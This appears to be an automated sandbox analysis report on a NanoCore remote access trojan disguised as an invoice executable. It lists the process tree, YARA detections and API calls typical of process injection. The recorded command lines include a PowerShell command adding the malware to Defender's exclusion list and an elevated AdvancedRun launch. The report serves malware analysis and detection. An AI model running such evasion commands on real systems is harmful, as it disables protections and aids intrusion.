                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff724c50000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:10:09
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                              Imagebase:0x400000
                                                                                                              File size:91000 bytes
                                                                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 3%, Metadefender, Browse
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Start time:15:10:11
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008
                                                                                                              Imagebase:0x400000
                                                                                                              File size:91000 bytes
                                                                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Start time:15:10:18
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
                                                                                                              Imagebase:0xae0000
                                                                                                              File size:430592 bytes
                                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:10:18
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff724c50000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:10:19
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                                                              Imagebase:0x11d0000
                                                                                                              File size:232960 bytes
                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:10:19
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff724c50000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:10:19
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:timeout 1
                                                                                                              Imagebase:0x13a0000
                                                                                                              File size:26112 bytes
                                                                                                              MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:10:21
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
                                                                                                              Imagebase:0x7ff6fee60000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:10:22
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                              Imagebase:0x7ff6fee60000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:10:23
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
                                                                                                              Imagebase:0xa80000
                                                                                                              File size:38008 bytes
                                                                                                              MD5 hash:A0F103F98EDE4DA72E178EE05DABE1E1
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 28%, ReversingLabs
                                                                                                              Reputation:low

                                                                                                              General

                                                                                                              Start time:15:10:26
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                                                                                                              Imagebase:0x4f0000
                                                                                                              File size:107624 bytes
                                                                                                              MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Start time:15:10:27
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                              Imagebase:0x7ff6eb840000
                                                                                                              File size:51288 bytes
                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:10:28
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
                                                                                                              Imagebase:0x1b0000
                                                                                                              File size:434592 bytes
                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:10:29
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
                                                                                                              Imagebase:0x7ff6fee60000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language

                                                                                                              General

                                                                                                              Start time:15:10:30
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180
                                                                                                              Imagebase:0x1b0000
                                                                                                              File size:434592 bytes
                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET

                                                                                                              General

                                                                                                              Start time:15:10:32
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                              Imagebase:0x7ff6fee60000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language

                                                                                                              General

                                                                                                              Start time:15:10:34
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
                                                                                                              Imagebase:0xa0000
                                                                                                              File size:38008 bytes
                                                                                                              MD5 hash:A0F103F98EDE4DA72E178EE05DABE1E1
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                                                                                                              Disassembly

                                                                                                              Code Analysis

                                                                                                                Executed Functions

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980704243.0000000008C40000.00000040.00000001.sdmp, Offset: 08C40000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .fsri\wdi\C$E.fsri\wdi\C$\wdi\C$ri\wdi\C$sri\wdi\C$x.shv\xfsnha ati tinrtnceirrE
                                                                                                                • API String ID: 0-2761163555
                                                                                                                • Opcode ID: df9c69a44f8bebd82d32123c223c071702af95efa449d29c2a4c2d9a2d265410
                                                                                                                • Instruction ID: 9c4e81f48915fc7f711b792db1c46f63e6d28eb2b0e35ccdaec4b33915f22ccd
                                                                                                                • Opcode Fuzzy Hash: df9c69a44f8bebd82d32123c223c071702af95efa449d29c2a4c2d9a2d265410
                                                                                                                • Instruction Fuzzy Hash: 76B46570911214CFCB24CF04DA88A99B7F2AF01306F86D0DAD5295F622D776DACACF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .st}{ mnlFX/$/"a.st}{ mnlFX/
                                                                                                                • API String ID: 0-928898513
                                                                                                                • Opcode ID: 5c2bcfe59a82655dfb009d06f8c4613c1b7fe44987977633c2dc75dee78d6c22
                                                                                                                • Instruction ID: 29f72b2af82f22804e09be1783f6f365d6e93a092a66ad6a7898419c777320c9
                                                                                                                • Opcode Fuzzy Hash: 5c2bcfe59a82655dfb009d06f8c4613c1b7fe44987977633c2dc75dee78d6c22
                                                                                                                • Instruction Fuzzy Hash: D8235F98A21260C8DB358F088198F6D66A3AF5634DF15919FC0541FF36E7F9C298C78B
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .st}{ mnlFX/$/"a.st}{ mnlFX/
                                                                                                                • API String ID: 0-928898513
                                                                                                                • Opcode ID: f2990c85d6c24ecc3c9f01c0af36b0cb6ed062ba5d81b89f42dd8aeb36364563
                                                                                                                • Instruction ID: a24d8e0f99f2c628b8f690afad1967e96a0dfc165da8d2a567dae2295316504e
                                                                                                                • Opcode Fuzzy Hash: f2990c85d6c24ecc3c9f01c0af36b0cb6ed062ba5d81b89f42dd8aeb36364563
                                                                                                                • Instruction Fuzzy Hash: A8235F98A21260C8DB358F088198F6D66A3AF5634DF15919FC0541FF36E7F9C298C78B
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,08A2706F,00000000,00000000), ref: 08A271C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: InformationThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 4046476035-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,08A2706F,00000000,00000000), ref: 08A271C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: InformationThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 4046476035-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 02D12A00
                                                                                                                • GetCurrentThread.KERNEL32 ref: 02D12A3D
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 02D12A7A
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D12AD3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 02D12A00
                                                                                                                • GetCurrentThread.KERNEL32 ref: 02D12A3D
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 02D12A7A
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D12AD3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08A2F1D6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08A2F1D6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D1DF2A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D1DF2A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D1DF2A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D12C4F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 08A2E7A8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 08A2E7A8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 08A2EA88
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 08A2EA88
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 08A2D7F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ContextThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1591575202-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 08A2D7F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ContextThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1591575202-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D12C4F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 02D1C23A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08A2E4C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 02D1C23A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08A2E4C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,02D1BD7B), ref: 02D1BFAE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
